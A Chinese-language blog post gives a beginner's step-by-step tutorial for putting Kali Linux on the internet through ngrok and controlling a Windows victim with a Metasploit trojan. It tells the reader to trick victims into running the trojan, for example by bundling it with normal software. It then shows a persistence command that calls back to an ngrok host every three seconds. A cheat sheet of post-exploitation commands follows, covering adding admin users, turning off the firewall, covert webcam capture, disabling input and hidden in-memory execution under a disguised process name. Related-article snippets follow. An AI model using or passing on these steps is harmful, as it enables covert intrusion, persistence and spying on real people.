Kali Linux 木马 内网穿透 保姆级教学

于 2024-06-08 15:46:46 发布
阅读量499 收藏 11
点赞数 5
文章标签: linux 运维 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73135216/article/details/139546307
版权

前言:在我的文章最早第一篇就发布了,但是当时用的是国内的飞鸽内网穿透,现在不仅仅要实名认证,而且免费的也没有了,部署和修改也比较麻烦。在这里我再推荐一个更好用的内网穿透,上手简单,而且完全免费也相对比较稳定可靠,就是大名鼎鼎的 Ngrok

https://dashboard.ngrok.com/icon-default.png?t=N7T8https://dashboard.ngrok.com/

 任务一  注册账号,(QQ邮箱不行!,我的GitHub账号由qq邮箱注册都无法授权)

任务二  如果遇到了一点问题请科学上网 咳咳嗯力挺非常good 魔戒.net 

任务三 这里选择Linux的,再去下载

任务四 下载完以后,将压缩包放到kali里面,解压。会得到ngrok文件

tar -xvzf ngrok-v3-stable-linux-amd64.tgz

任务五 配置文件 回到APT,会发现下面有 密钥,复制

任务六 配置 ,在kali里面输入进去,在执行的时候记得加上 "./",出现了下面这个就是成功了.

任务七  连接服务器,进行内网穿透,本地监听端口

任务八 生成msf木马(未免杀) ,注意自己端口和地址

任务九 利用msf,使用以下模块 ,我这里监听端口是2024,是因为我左上角设置2024!!!

任务十 在Windows运行(在现实中,你要诱导受害者点击,比如捆绑正常软件.....等)

任务十一  添加持久性木马(后渗透),当你再次使用模块监听时,会自动连接

run persistence -X -i 3 -r [公网服务器名称 0.tcp.jp.ngrok.io] -p [公网端口]
-X                 //开机自启动
-i                 //回连的时间间隔 (-i 3 代表每3秒钟连接我们一次)
-r                 //目标机器 IP 地址(攻击主机)
-p                 //监听反向连接端口号

 

任务十二 kali后渗透命令 

 

基础命令
shell         #进入目标机cmd shell
background    #将当前会话放置后台
sessions      #sessions -h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
bgrun / run   #执行已有的模块,输入run后按两下tab,列出已有的脚本
info      #查看已有模块信息
getuid    #查看当前用户身份
getprivs  #查看当前用户具备的权限
getpid    #获取当前进程ID(PID)
sysinfo   #查看目标机系统信息
irb   #开启ruby终端
ps    #查看正在运行的进程    
kill <PID值> #杀死指定PID进程
idletime     #查看目标机闲置时间
reboot / shutdown    #重启/关机
 
cmd命令
whoami     #当前权限
quser      #当前在线的管理员
net user   #存在用户
net user 用户名 密码 /add            #添加用户和对应密码
net localgroup 用户组名 用户名 /add  #将指定用户添加到指定用户组
netstat -ano  #查询当前计算机中网络连接通信情况,LISTENING表示该端口处于监听状态;ESTABLISHED表示该端口处于工作(通信)状态
systeminfo     #查看当前计算机中的详细情况
tasklist /svc  #查看每个进程所对应的服务
taskkill /f /im 程序名称    #结束某个指定名称的程序
taskkill /f /PID ID        #结束某个指定PID的进程
tasklist | findstr "字符串" #查找输出结果中指定的内容
netsh adcfirewall set allprofiles state off  #关闭防火墙
logoff        #注销某个指定用户的ID
shutdown -r   #重启当前计算机

 

​​​​​​​webcam摄像头命令
webcam_list     #查看摄像头
webcam_snap     #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse     #禁用鼠标
uictl disable keyboard  #禁用键盘
execute执行文件
execute   #在目标机中执行文件
execute -H -i -f  cmd.exe   #创建新进程cmd.exe,-H不可见,-i交互
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
  #-d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行
  #"-o hack.txt"是payload.exe的运行参数

 这几段是从别的文章复制过来的,有兴趣就去看

【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全_kali的meterpreter查看摄像头命令-CSDN博客

 任务十三 收工

 

 

淡水猫.
关注
  • 5
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2243
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
kali linux内网穿透(内网上线)
边城浪子的博客
08-09 1万+
windsow下内网上线很简单,也比较容易理解,换做kali linux也是一样的,下面介绍花生壳内网穿透,以此来记录自己的成长历程。 实验环境: 虚拟机,kali linux 2.0,phddns_3.0_x86_64.deb(花生壳linux安装包) 1.在虚拟机中启动kali linux 2.0,安装phddns_3.0_x86_64.deb step1:在花生壳官网下载软件...
kali-frp内网穿透
乌托托的博客
12-24 1304
什么是内网穿透?内网,就是在公司或者家庭内部,建立的局域网络或者是办公网络,可以实现多台电脑之间的资源共享,包括设备、资料、数据等。而外网则是通过一个网关与其它的网络系统连接,相对于内网而言,这种网络系统称之为外部网络,常见的就是我们日常使用的互联网。一般而言,在没有固定公网IP的情况下,外网设备无法直接访问内网设备。而内网穿透技术,顾名思义就是能让外网的设备找到处于内网的设备,从而实现数据通信。内网穿透的原理内网穿透,又称为NAT穿透。
如何在Kali linux简单内网穿透
Sunspot
03-27 1244
注意:将替换为您想要绑定到本地的端口号,和替换为您要访问的内部服务器的IP地址和端口号,和替换为您远程服务器的用户名和IP地址。在公网服务器上运行服务端软件,将其配置为监听指定端口。这将在公网服务器上创建一个反向SSH隧道,将公网服务器的指定端口转发到内网机器的SSH端口上。这将在公网服务器上创建一个反向SSH隧道,将公网服务器的指定端口转发到内网机器的SSH端口上。
内网穿透之运行木马程序
CP1024的博客
10-04 654
步骤: 1.自己必须要能运行CS,并且在内网自己可以实现运行木马 2.两个内网之间: 简单步骤: 公网图片 本机图片: CS图片: 木马在win7图片: 这只是简单的步骤,如果实现不懂,可以在下方评论,我可以给你解答。 ...
kali 安装cpolar内网穿透实现 ssh 远程连接
小吉妙妙屋
09-05 2328
简单几步通过cpolar 内网穿透软件实现ssh 远程连接kali!
Kali Linux渗透测试高篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
精通Kali Linux渗透测试2023版本,英文原版
07-12
The COVID-19 pandemic has changed the way the world operates. Organizations of all sizes have transformed themselves from having none or partial remote working to all of their employees ...
kali Linux操作系统高测试实验
最新发布
06-17
### Kali Linux操作系统高测试实验 #### 一、实验背景及目标 Kali Linux是一款专为信息安全专家设计的Linux发行版,内置了大量用于渗透测试、安全审计等场景的工具。本实验旨在通过一系列高测试实验,加深对...
2023最新版kali安装教程-保姆
08-01
《2023最新版kali安装教程-保姆详解》 Kali Linux是一款基于Debian的开源操作系统,专门用于网络安全审计和渗透测试。本文将详细介绍2023年最新版Kali Linux的安装步骤,从下载镜像到在VMware上创建虚拟机,再到...
[Kali Linux]入门:内网穿透的教程和实战(很适合入门|附图)
MSB_WLAQ的博客
10-07 5158
hello 各位freebuf的铁铁,我是白面安全猿,我又来发表文章了。因为最近有好多网友问我关于内网穿透的事情,所以打算写一篇教程尽量教会各位刚入门kali的新手和没有具体了解过内网穿透的老手内网穿透! 我这个人也不喜欢搞什么花里胡少的东西,原理我就不多说了,说了新手理解起来比较吃力,都是从那一步来的都知道。如果想要具体去了解内网穿透原理的话可以去看看其他博主的文章。 首先想要内网穿透的话必须先要用到内网穿透的工具,很多第三方都提供了内网穿透的工具,比如花生壳啊或者飞鸽啊等等,那么我这里推荐一下sun
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 853
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
内网kali映射到公网实现访问
afei001
11-01 3609
实验工具 GateOne ngrok 实验目的     将内网中web端的kali映射到公网,通过公网访问特定的域名就能登录到内网中的kali 1.GateOne简介      GateOne是一款使用HTML5技术编写的网页版 SSH 终端模拟器。基于现代的HTML5 技术,无需任何浏览器插件、支持多个SSH 进程、可以嵌入到其他任意应用程序中、支持使用 JavaScript、Python甚至...
kali配置肉鸡(内网穿透
qq_33391644的博客
02-06 4613
通过Sunny-Ngrok进行端口映射 教学地址:https://jingyan.baidu.com/article/b0b63dbf0938c74a49307046.html 如果kali linux无法启动sunny-ngrok的话可以用主机来启动映射,sunny-ngrok隧道的本地ip一定要写kali linux主机的ip; Sunny-NgrokWindows使用方法:ht
4、内网安全-隧道&内网穿透上线&Ngrok&FRP&NPS&SPP&EW项目
m0_65842464的博客
01-06 1322
内网主机通过隧道与外网主机建立连接,隧道通过配置可以将访问外网主机的流量转发给内网主机,从而实现本地Kali虚拟机控制别人电脑上线
Ngrok内网穿透配合msf木马
sky
06-18 4122
Ngrok内网穿透配合msf木马   1. Ngrok的安装 原文地址:http://www.ggsec.cn/ Ngrok的下载地址:https://ngrok.com/download 下载对应版本并注册帐号 解压后将其放入 /bin/ ngrok  authtoken 6RBm_2CfWq3xAJ3XVK(6RBm_2CfWq3xAJ3XVK是你注册后给你的)   2.tc
通过ssh tunnel让Kali实现内网穿透
水中加点糖
05-07 7919
拥有设备: 1.Kali 2.0虚拟机一台 2.外网Linux服务器一台,(CentOs x64) 问题如下: 在电脑上安装了一台kali 2.0的虚拟机,通过nat物理机的网卡可以访问互联网,现在想要实现可以通过其他任何可访问到互联网的主机能访问到该Kali 实现操作如下: 一、打开Kali的ssh服务 (1)修改sshd_config文件,命令为: vi /e...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值